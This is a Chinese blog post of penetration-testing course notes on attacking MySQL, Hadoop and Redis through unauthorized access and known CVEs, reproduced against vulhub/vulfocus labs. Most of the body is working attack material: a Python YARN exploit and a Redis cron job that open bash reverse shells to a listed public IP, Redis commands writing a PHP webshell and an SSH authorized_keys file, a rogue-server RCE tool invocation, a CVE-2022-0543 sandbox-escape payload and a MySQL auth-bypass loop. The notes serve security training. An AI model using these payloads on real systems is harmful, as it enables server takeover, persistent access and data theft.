day55 数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE

最新推荐文章于 2024-05-23 18:39:28 发布
最新推荐文章于 2024-05-23 18:39:28 发布
阅读量403 收藏
点赞数
分类专栏: 小迪网安笔记 文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hesysd/article/details/128776413
版权

#知识点:

1、服务攻防-数据库类型安全

2、Redis&Hadoop&Mysql安全

3、Mysql-CVE-2012-2122漏洞

4、Hadoop-配置不当未授权三重奏&RCE漏洞

3、Redis-配置不当未授权三重奏&RCE两漏洞

#章节内容:

常见服务应用的安全测试:

1、配置不当-未授权访问

2、安全机制-特定安全漏洞

3、安全机制-弱口令爆破攻击

#前置知识:

应用服务安全测试流程:见图

1、判断服务开放情况-端口扫描&组合应用等

2、判断服务类型归属-数据库&文件传输&通讯等

3、判断服务利用方式-特定漏洞&未授权&弱口令等

#Mysql-未授权访问-CVE-2012-2122利用

复现环境:vulhub 内置端口33067

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done

#Hadoop-未授权访问-内置配合命令执行RCE

复现环境:vulfocus

exp:

import requests

target = 'http://123.58.236.76:31361/'

lhost = '47.94.236.117' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'

resp = requests.post(url)

app_id = resp.json()['application-id']

url = target + 'ws/v1/cluster/apps'

data = {

'application-id': app_id,

'application-name': 'get-shell',

'am-container-spec': {

'commands': {

'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,

},

},

'application-type': 'YARN',

}

requests.post(url, json=data)

#Redis-未授权访问-Webshell&任务&密匙&RCE等

1、写Webshell 需得到Web路径

利用条件:Web目录权限可读写

config set dir /tmp #设置WEB写入目录

config set dbfilename 1.php #设置写入文件名

set test "<?php phpinfo();?>" #设置写入文件代码

bgsave #保存执行

save #保存执行

注意:部分没目录权限读写权限

2、写定时任务反弹shell

利用条件:

允许异地登录

安全模式protected-mode处于关闭状态

config set dir /var/spool/cron

set yy "\n\n\n* * * * * bash -i >& /dev/tcp/47.94.236.117/5555 0>&1\n\n\n"

config set dbfilename x

save

注意:

centos会忽略乱码去执行格式正确的任务计划

而ubuntu并不会忽略这些乱码,所以导致命令执行失败

3、写入Linux ssh-key公钥

利用条件:

允许异地登录

Redis服务使用ROOT账号启动

安全模式protected-mode处于关闭状态

允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器

ssh-keygen -t rsa

cd /root/.ssh/

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

cat key.txt | redis-cli -h 118.31.57.214 -x set xxx

config set dir /root/.ssh/

config set dbfilename authorized_keys

save

cd /root/.ssh/

ssh -i id_rsa root@118.31.57.214

4、RCE自动化利用脚本-vulfocus

https://github.com/vulhub/redis-rogue-getshell

python redis-master.py -r 123.58.236.76 -p 11820 -L 47.94.236.117 -P 8888 -f RedisModulesSDK/exp.so -c "id"

5.新漏洞-沙箱绕过RCE CVE-2022-0543-vulfocus

Poc:执行id命令

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

匿名用户0x3c
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
keepalived 监测mysql&&redis 高可用配置和脚本
06-27
keepalived 监测mysql&&redis 高可用配置和脚本
数据库服务安全--Mysql授权--Hadoop授权配合RCE--Redis授权&RCE
weixin_68243135的博客
11-21 2173
数据库安全漏洞--MySQL--Hadoop--Redis
55天:服务攻防-数据库安全&Redis&Hadoop&Mysql&授权访问&RCE
weixin_71529930的博客
04-08 991
也会输入这个文件当中造成影响,可以新开一个kali窗口,进行纯净版的输入,如图。因为root用户只能本地登录,可以采取利用phpmyadmin去远程登录利用,爆破密码。1.redis.conf中 bind表示允许谁访问,被注释了表示都可以访问。首先centos中的计时任务,可以写在/var/spool/cron中。利用该攻击方式,还需要允许密钥对登录,并且redis以root登录。访问你的ip地址/cluster/apps,如果存在证明有漏洞。如果没有端口,利用组合猜测,例如:php-mysql
护网经验&面试题目原版
LCW991207的博客
05-20 634
面试官您好,我是。熟悉常见的TOP10漏洞,有一定基本漏洞扫描和渗透能力 ,日志分析以及安全设备告警分析,能看懂安全产品,然后在校期间也是参加过项目研发的。将shellcode进行加密,动态解密恢复,申请可写可执行内存并写入解密后的shellcode,将函数指针指向这块内存的起始位置并开始执行。
Github网络安全测试工具库
热门推荐
网络安全
08-30 6万+
(web应用扫描器,支持指纹识别,文件目录爆破,SQL / XSS / RFI等漏洞扫描,也可直接用于struts,ShellShock等扫描)(一款开源Poc调用框架,可轻松调用Pocsuite,Tangscan,Beebeeto,Knowsec老版本POC,可使用docker部署)(一款web应用漏洞扫描器,支持扫描反射型以及存储型xss,sql injection等漏洞,支持输出pdf报告)(快速识别WEB服务器类型,CMS类型,WAF类型,WHOIS信息,以及语言框架)
web安全学习
m0_73767545的博客
09-12 395
子域名两套CMS(同一服务器/不同服务器【同网关/不同网关】)也就是说对于同一网站页面,有不同域名,域名差异可能是前面,也可能是后面。利用网站抓包,server,如果信息比较全,可能是搭建软件。Day08--信息收集(架构,搭建,WAF)Day09--信息收集()
10.Linux-centos7安装jdk&mysql&redis
08-24
centos7安装mysql 5、centos7安装jdk、redis
redis && kafka搭建
02-03
redis && kafka搭建
memcache&redis构建缓存服务器.pdf
08-17
memcache&redis构建缓存服务pdf文档
MySQL&Redis安装使用规范
12-08
随着公司业务不断的发展,架设在开源数据库(MySQL&Redis等)业务系统数量越来越多。为了科学、有效的管理开源数据库,确保数据库的高效稳定运行的同时,通过制度规范保障企业数据信息安全,给业务系统提供可持续的...
雅特力AT32 MCU通过IEC 60730功能安全认证,为家电产品提供安全保障
2401_83906209的博客
05-20 260
在我们的生活环境中,家电及电子产品功能安全的重要性不容忽视,为避免系统故障时产生危害人身安全的风险,在家电和电子产品上市前都严格要求通过安规认证,确保使用操作上的安全性。IEC 60730作为国际电工委员会制定的家电产品安全标准,AT32 MCU获得此认证不仅证明了其在家电领域的领先实力,更为消费者提供了安全无忧的使用体验,家电厂商可以将认证过的AT32 MCU安全库,快速嵌入家电和电子产品软件系统中进行自检,进而申请最终产品的IEC 60730功能安全标准相关认证,减少开发时间和成本,加速产品上市时程。
内网安全--域渗透准备知识
金灰的博客
05-22 499
通过域成员主机,定位出域控制器 IP 及域管理员账号,利用 域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性, 定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员密码,进 而拿下域控制器、渗透整个内网.某个域用户需要使用 viso 软件进行绘图操作,于是联系网络管理员进行安装,网络管理 员采用域管理员身份登录了域成员主机,并帮助其安装了 viso 软件,于是这个有计算机 基础的员工,切换身份登录到了本地计算机的管理员,后执行。
怎样使用安全组?
2301_78491269的博客
05-23 321
目前,VPC 类型实例的数量上限是 2000,对所有 VPC 类型实例的安全组都生效。需要注意的是,上限 2000 指的是所有实例包含的私网 IP 个数(主网卡和辅助网卡共享此配额),而不是实例个数。说明:目前,一个实例中的每个弹性网卡默认最多可以加入 5 个安全组,所以一个实例的每个弹性网卡最多可以包含 500 条安全组规则,能够满足绝大多数场景的需求。不可以,每个安全组最多可以包含 100 条安全组规则。如果不存在冗余规则,请拆分安全组。每个安全组的入站规则与出站规则的总数不能超过 100。
【软考中级 软件设计师】计算机网络和安全
最新发布
shaozheng0503的博客
05-23 848
蠕虫病毒,作为一种高度自足的恶意软件,其核心特征在于其自我复制与传播能力,无需借助其他程序或人为操作即可在计算机网络中迅速蔓延。这类病毒利用操作系统或应用程序的安全漏洞,通过网络连接自动寻找新的宿主进行感染,其传播机制通常包括但不限于电子邮件、网络共享、即时消息等渠道。例如,“红色代码”病毒便是通过HTTP服务器的漏洞传播,而“爱虫病毒”则是通过电子邮件附件进行扩散,两者均展现了蠕虫病毒通过网络自我复制的特性。相比之下,“冰河”则被归类为远程控制木马(Trojan Horse),其运作模式与蠕虫截然不同。
红队攻防渗透技术实战流程:云安全之云原生安全:K8s搭建及节点漏洞利用
HACKONE的博客
05-21 470
Kubernetes是一个开源的,用于编排云平台中多个主机上的容器化的应用,目标是让部署容器化的应用能简单并且高效的使用, 提供了应用部署,规划,更新,维护的一种机制。其核心的特点就是能够自主的管理容器来保证云平台中的容器按照用户的期望状态运行着,管理员可以加载一个微型服务,让规划器来找到合适的位置,同时,Kubernetes在系统提升工具以及人性化方面,让用户能够方便的部署自己的应用。随着越来越多企业开始上云的步伐,在攻防演练中常常碰到云相关的场景,例:公有云、私有云、混合云、虚拟化集群等。
Nginx SSL/TLS配置:搭建安全的HTTPS网站
Dxy1239310216的博客
05-23 404
Nginx作为一款高性能的HTTP和反向代理服务器,支持SSL/TLS协议,使得我们可以轻松地搭建安全的HTTPS网站。下面,我们将详细介绍如何在Nginx上配置SSL/TLS,以搭建一个安全的HTTPS网站。此外,你还可以使用在线的SSL检测工具(如SSL Labs的SSL Test)来检查你的HTTPS配置是否安全。如果一切正常,你应该能看到一个绿色的地址栏,表示你的网站已经成功启用了HTTPS。现在,你可以通过浏览器访问你的网站,并使用HTTPS协议(即使用。
领域知识 | 智能驾驶安全领域部分常见概论
叫好与叫座虽然不是对立面,但想在同一个作品中达到双重效果很难。
05-23 1259
Hi,早。最近想买个新能源车,这个车吧相比于之前的内燃车,新能源车与外界的交互多了很多。比如娱乐的第三方应用,OTA升级等应用。交互带来的便利越多,暴露的风险自然也就越大,相比于手机等消费者终端设备,车要是被黑客远程操控,这就玩大了。所以对于车规级的芯片和系统,从沙子开始就有相应得规范来保证安全。作为一个曾经的安全领域的不知名靓仔,于是就在这里整理回忆了部分涉及到的概念和理论记录如下。保证一个系统的安全,需要从多个维度去考虑。网络、通信、系统、应用、硬件等多方面。
常见网络攻击及解决方案
weixin_54714100的博客
05-14 1378
网络安全是开发中常常会遇到的情况,为什么会遇到网络攻击,网络攻击是如何进行的,如何抵御网络攻击,都是我们需要思考的问题。
nohup redis-server > redis.log 2>&1 &
11-29
这是一个在后台运行Redis服务器的命令,并将输出重定向到redis.log文件中。其中nohup命令用于在退出终端后继续运行进程,&符号用于将进程放入后台运行。2>&1表示将标准错误输出重定向到标准输出,这样可以将所有输出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

匿名用户0x3c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值